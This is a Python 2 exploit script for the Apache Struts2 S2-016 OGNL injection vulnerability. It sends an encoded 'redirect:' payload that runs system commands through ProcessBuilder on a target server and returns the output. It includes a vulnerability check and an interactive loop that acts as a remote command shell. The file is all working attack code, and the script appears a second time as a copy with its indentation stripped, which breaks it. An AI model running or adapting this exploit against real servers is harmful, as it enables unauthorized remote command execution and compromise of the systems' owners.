wcc526/s2_016.py

## s2_016.py
#!/usr/bin/env python
import urllib
import urllib2
import re
import sys
url_exp = "?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}"
def judge(url):
    #判断是否存在该漏洞
    try:
        url = url + url_exp
        #print url
        url_request = urllib2.Request(url)
        response = urllib2.urlopen(url_request)
        res_html = response.read()
        #print res_html[:100]
        if res_html.find(">") > 0:
            return "Failed"
        else:
            return "OK"
        #print response.func_code
    except :
        return "ERROR"
def get_args(argument):
    args = argument.split(' ')
    args_deal = ''
    for i in args:
        args_deal = args_deal + "'" + i + "',"
    args_deal = args_deal[:-1]
    return args_deal
def strip(str):
    #
    #去除首尾的\x00串
    #
    tmp = str.strip()
    blank_line=re.compile('\x00')
    tmp=blank_line.sub('',tmp)
    return tmp
def attack(url):
    #
    #DO IT
    #
    try:
        url_request = urllib2.Request(url)
        response = urllib2.urlopen(url_request)
        res_html = response.read().strip()
        return strip(res_html)
    except :
        return "ERROR"
if __name__ == '__main__':
    if len(sys.argv) > 1:
        #print get_url("ls -al")
        if judge(sys.argv[1]) == "OK":
            print "Success"
            pattern = re.compile(r'http[s]?://([\w\W]*?)/')
            url = sys.argv[1] + url_exp
            hostname = pattern.findall(url)
            #print hostname[0]
            loop = 1
            while loop:
                string = raw_input(hostname[0] + " >")

                if string.startswith("exit"):
                    break
                    loop=0
                if len(string) > 0:
                    url_ = url.replace("'whoami'",get_args(string))
                    #print url_
                    print attack(url_)
        else:
            print "Failed"
    else:
        print("No argument!")
	#!/usr/bin/env python
	import urllib
	import urllib2
	import re
	import sys
	url_exp = "?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}"
	def judge(url):
	#判断是否存在该漏洞
	try:
	url = url + url_exp
	#print url
	url_request = urllib2.Request(url)
	response = urllib2.urlopen(url_request)
	res_html = response.read()
	#print res_html[:100]
	if res_html.find(">") > 0:
	return "Failed"
	else:
	return "OK"
	#print response.func_code
	except :
	return "ERROR"
	def get_args(argument):
	args = argument.split(' ')
	args_deal = ''
	for i in args:
	args_deal = args_deal + "'" + i + "',"
	args_deal = args_deal[:-1]
	return args_deal
	def strip(str):
	#
	#去除首尾的\x00串
	#
	tmp = str.strip()
	blank_line=re.compile('\x00')
	tmp=blank_line.sub('',tmp)
	return tmp
	def attack(url):
	#
	#DO IT
	#
	try:
	url_request = urllib2.Request(url)
	response = urllib2.urlopen(url_request)
	res_html = response.read().strip()
	return strip(res_html)
	except :
	return "ERROR"
	if __name__ == '__main__':
	if len(sys.argv) > 1:
	#print get_url("ls -al")
	if judge(sys.argv[1]) == "OK":
	print "Success"
	pattern = re.compile(r'http[s]?://([\w\W]*?)/')
	url = sys.argv[1] + url_exp
	hostname = pattern.findall(url)
	#print hostname[0]
	loop = 1
	while loop:
	string = raw_input(hostname[0] + " >")

	if string.startswith("exit"):
	break
	loop=0
	if len(string) > 0:
	url_ = url.replace("'whoami'",get_args(string))
	#print url_
	print attack(url_)
	else:
	print "Failed"
	else:
	print("No argument!")